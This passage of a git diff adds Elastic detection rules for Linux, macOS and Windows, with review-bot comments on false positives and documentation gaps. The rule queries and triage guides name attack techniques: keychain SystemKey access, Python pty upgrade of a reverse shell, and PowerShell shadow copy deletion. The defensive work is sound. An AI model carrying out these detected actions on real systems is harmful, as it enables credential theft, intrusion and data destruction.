@@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Monitors for grep activity related to memory mapping. The /proc/*/maps file in Linux provides a memory map for a specific process, detailing the memory segments, permissions, and what files are mapped to these segments. Attackers may read a process's memory map to identify memory addresses for code injection or process hijacking.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Memory grep Activity", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and event.type == \"start\" and\nprocess.name in (\"grep\", \"egrep\", \"fgrep\", \"rgrep\") and process.args in (\"[stack]\", \"[vdso]\", \"[heap]\")\n", + "references": [ + "https://github.com/arget13/DDexec" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "d74d6506-427a-4790-b170-0c2a6ddac799", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1057", + "name": "Process Discovery", + "reference": 
"https://attack.mitre.org/techniques/T1057/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "d74d6506-427a-4790-b170-0c2a6ddac799_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d74d6506-427a-4790-b170-0c2a6ddac799_2.json b/packages/security_detection_engine/kibana/security_rule/d74d6506-427a-4790-b170-0c2a6ddac799_2.json new file mode 100644 index 00000000000..d0400f423a4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d74d6506-427a-4790-b170-0c2a6ddac799_2.json 
@@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Monitors for grep activity related to memory mapping. The /proc/*/maps file in Linux provides a memory map for a specific process, detailing the memory segments, permissions, and what files are mapped to these segments. Attackers may read a process's memory map to identify memory addresses for code injection or process hijacking.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Memory grep Activity", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and\nprocess.name in (\"grep\", \"egrep\", \"fgrep\", \"rgrep\") and process.args in (\"[stack]\", \"[vdso]\", \"[heap]\")\n", + "references": [ + "https://github.com/arget13/DDexec" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "d74d6506-427a-4790-b170-0c2a6ddac799", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1057", + "name": "Process Discovery", + "reference": 
"https://attack.mitre.org/techniques/T1057/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "d74d6506-427a-4790-b170-0c2a6ddac799_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_106.json b/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_106.json new file mode 100644 index 00000000000..fa79c5e87ef --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_106.json 
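Review bot: The rule carries no `false_positives` entry even though `process.args in ("[stack]", "[vdso]", "[heap]")` matches any grep invocation whose argument list contains one of these exact tokens, not only reads of `/proc/*/maps` as the `description` states; debugging and diagnostics scripts are a plausible benign source. As a `Rule Type: BBR` building block with `risk_score` 21 that is tolerable, but the expected benign sources should be documented, for example a `false_positives` item such as `"Legitimate debugging or diagnostics tooling that inspects process memory maps. Verify the parent process and user before escalating."`. Relative to `_1` the only query change is the order of the `event.type` and `event.action` terms, which is semantically neutral.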
@@ -0,0 +1,87 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features, including Wi-Fi and website passwords, secure notes, certificates, and Kerberos. Adversaries may collect the keychain storage data from a system to acquire credentials.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "SystemKey Access via Command Line", + "query": "event.category:process and host.os.type:macos and event.type:(start or process_started) and\n process.args:(\"/private/var/db/SystemKey\" or \"/var/db/SystemKey\")\n", + "references": [ + "https://github.com/AlessandroZ/LaZagne/blob/master/Mac/lazagne/softwares/system/chainbreaker.py" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "d75991f2-b989-419d-b797-ac1e54ec2d61", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/", + "subtechnique": [ + { + "id": "T1555.001", + "name": "Keychain", + "reference": "https://attack.mitre.org/techniques/T1555/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "d75991f2-b989-419d-b797-ac1e54ec2d61_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_110.json b/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_110.json new file mode 100644 index 00000000000..2d79c5bd90d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_110.json 
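Review bot: This `severity: high`, `risk_score` 73 rule ships without a `note` investigation guide and without a `false_positives` entry, whereas the WDigest rule earlier in this diff (`d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_109`) carries a full triage section and the `Resources: Investigation Guide` tag. A short `note` covering at least the parent process, the invoking user, and whether the `/var/db/SystemKey` read came from an expected backup or management agent would make the alert actionable for the analyst who receives it. If such a guide already exists upstream, this export may simply be stale; worth confirming against the rule source before the package is published.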
@@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a terminal (tty) is spawned via Python. Attackers may upgrade a simple reverse shell to a fully interactive tty after obtaining initial access to a host.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Interactive Terminal Spawned via Python", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and\n(\n (process.parent.name : \"python*\" and process.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\",\n \"fish\") and process.parent.args_count >= 3 and process.parent.args : \"*pty.spawn*\" and process.parent.args : \"-c\") or\n (process.parent.name : \"python*\" and process.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\",\n \"fish\") and process.args : \"*sh\" and process.args_count == 1 and process.parent.args_count == 1)\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "d76b02ef-fc95-4001-9297-01cb7412232f", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic 
Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.006", + "name": "Python", + "reference": "https://attack.mitre.org/techniques/T1059/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "d76b02ef-fc95-4001-9297-01cb7412232f_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_104.json b/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_104.json new file mode 100644 index 00000000000..ae67631554b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_104.json 
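Review bot: The `setup` text in this hunk links `https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html`, a version-pinned URL, while every other link in the same block (and the macOS variant of this setup text in the hunk above) uses `current`; it is presumably a copy/paste leftover and will go stale as the rule is re-released. Suggested line: `For more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).` so the guidance tracks the published docs like the rest of the package.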
@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects events that may indicate use of SMTP on TCP port 26. This port is commonly used by several popular mail transfer agents to deconflict with the default SMTP port 25. This port has also been used by a malware family called BadPatch for command and control of Windows systems.", + "false_positives": [ + "Servers that process email traffic may cause false positives and should be excluded from this rule as this is expected behavior." + ], + "from": "now-9m", + "index": [ + "packetbeat-*", + "auditbeat-*", + "filebeat-*", + "logs-network_traffic.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "SMTP on Port 26/TCP", + "query": "(event.dataset: (network_traffic.flow or zeek.smtp) or event.category:(network or network_traffic)) and network.transport:tcp and destination.port:26\n", + "references": [ + "https://unit42.paloaltonetworks.com/unit42-badpatch/", + "https://isc.sans.edu/forums/diary/Next+up+whats+up+with+TCP+port+26/25564/" + ], + "related_integrations": [ + { + "package": "network_traffic", + "version": "^1.1.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "d7e62693-aab9-4f66-a21a-3d79ecdd603d", + "severity": "low", + "tags": [ + "Tactic: Command and Control", + "Domain: Endpoint", + "Use Case: Threat Detection" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": 
"https://attack.mitre.org/tactics/TA0010/"
+ },
+ "technique": [
+ {
+ "id": "T1048",
+ "name": "Exfiltration Over Alternative Protocol",
+ "reference": "https://attack.mitre.org/techniques/T1048/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "query",
+ "version": 104
+ },
+ "id": "d7e62693-aab9-4f66-a21a-3d79ecdd603d_104",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_7.json b/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_7.json
new file mode 100644
index 00000000000..9b33869d609
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_7.json
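Review bot: The `query` in this rule matches on `destination.port:26` with `network.transport:tcp` alone when `event.category` is `network`/`network_traffic`, so any TCP flow to port 26 fires regardless of protocol; only the `zeek.smtp` dataset branch actually confirms SMTP. The rule name "SMTP on Port 26/TCP" and the single `false_positives` entry (mail servers) therefore understate the noise profile. Consider adding a second `false_positives` entry such as `"Any non-SMTP service bound to TCP port 26 will match, since the flow-based portion of the query does not inspect the application protocol."`. The `tags` also carry `Domain: Endpoint` although the rule reads only network indices (`packetbeat-*`, `logs-network_traffic.*`); the tag looks inherited rather than intentional and is worth checking against the package's tagging convention.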
@@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempt to load an untrusted driver. Adversaries may modify code signing policies to enable execution of unsigned or self-signed code.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.library-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Untrusted Driver Loaded", + "note": "## Triage and analysis\n\n### Investigating Untrusted Driver Loaded\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies an attempt to load an untrusted driver, which effectively means that DSE was disabled or bypassed. This can indicate that the system was compromised.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from. 
If you're using Elastic Defend, path information can be found in the `dll.path` field.\n - Examine the file creation and modification timestamps:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `dll.Ext.relative_file_name_modify_time` fields. The values are in seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts 
from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "driver where host.os.type == \"windows\" and process.pid == 4 and\n dll.code_signature.trusted != true and \n not dll.code_signature.status : (\"errorExpired\", \"errorRevoked\")\n", + "references": [ + "https://github.com/hfiref0x/TDL", + "https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)?redirectedfrom=MSDN" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "dll.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], + "risk_score": 73, + "rule_id": "d8ab1ec1-feeb-48b9-89e7-c12e189448aa", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.001", + "name": "Invalid Code Signature", + "reference": "https://attack.mitre.org/techniques/T1036/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": 
"eql",
+ "version": 7
+ },
+ "id": "d8ab1ec1-feeb-48b9-89e7-c12e189448aa_7",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_110.json b/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_110.json
new file mode 100644
index 00000000000..fa6809bf7a7
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_110.json
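Review bot: The `query` excludes drivers whose `dll.code_signature.status` is `errorExpired` or `errorRevoked`, but neither the `description` nor the Triage and analysis `note` mentions this, so an analyst reading the investigation guide would assume every untrusted driver load is covered; a driver carrying a revoked certificate is exactly the case where `trusted != true` is expected and it is silently dropped here. The exclusion is presumably a noise trade-off (expired certificates on legitimate legacy drivers), but that rationale should be stated rather than left implicit. Suggest adding to the "False positive analysis" section a line such as `- Drivers whose signature status is errorExpired or errorRevoked are intentionally excluded from this rule to reduce noise; review those statuses separately if revoked-certificate drivers are a concern in your environment.` so the coverage boundary is documented alongside the rule.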
@@ -0,0 +1,121 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies the use of the Win32_ShadowCopy class and related cmdlets to achieve shadow copy deletion. This commonly occurs in tandem with ransomware or other destructive attacks.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Volume Shadow Copy Deletion via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Volume Shadow Copy Deletion via PowerShell\n\nThe Volume Shadow Copy Service (VSS) is a Windows feature that enables system administrators to take snapshots of volumes that can later be restored or mounted to recover specific files or folders.\n\nA typical step in the playbook of an attacker attempting to deploy ransomware is to delete Volume Shadow Copies to ensure that victims have no alternative to paying the ransom, making any action that deletes shadow copies worth monitoring.\n\nThis rule monitors the execution of PowerShell cmdlets to interact with the Win32_ShadowCopy WMI class, retrieve shadow copy objects, and delete them.\n\n#### Possible investigation steps\n\n- Investigate the program execution chain (parent process tree).\n- Check whether the account is authorized to perform this operation.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If unsigned files are found on the process tree, retrieve them and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - 
Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences in other hosts.\n- Check if any files on the host machine have been encrypted.\n\n\n### False positive analysis\n\n- This rule has chances of producing benign true positives (B-TPs). If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Related rules\n\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Priority should be given due to the advanced stage of this activity on the attack.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- If data was encrypted, deleted, or modified, activate your data recovery plan.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and\n process.args : (\"*Get-WmiObject*\", \"*gwmi*\", \"*Get-CimInstance*\", \"*gcim*\") and\n process.args : (\"*Win32_ShadowCopy*\") and\n process.args : (\"*.Delete()*\", \"*Remove-WmiObject*\", \"*rwmi*\", \"*Remove-CimInstance*\", \"*rcim*\")\n", + "references": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/vsswmi/win32-shadowcopy", + "https://powershell.one/wmi/root/cimv2/win32_shadowcopy", + "https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "d99a037b-c8e2-47a5-97b9-170d076827c4", + "setup": "## Setup\n\nIf enabling an EQL rule on a 
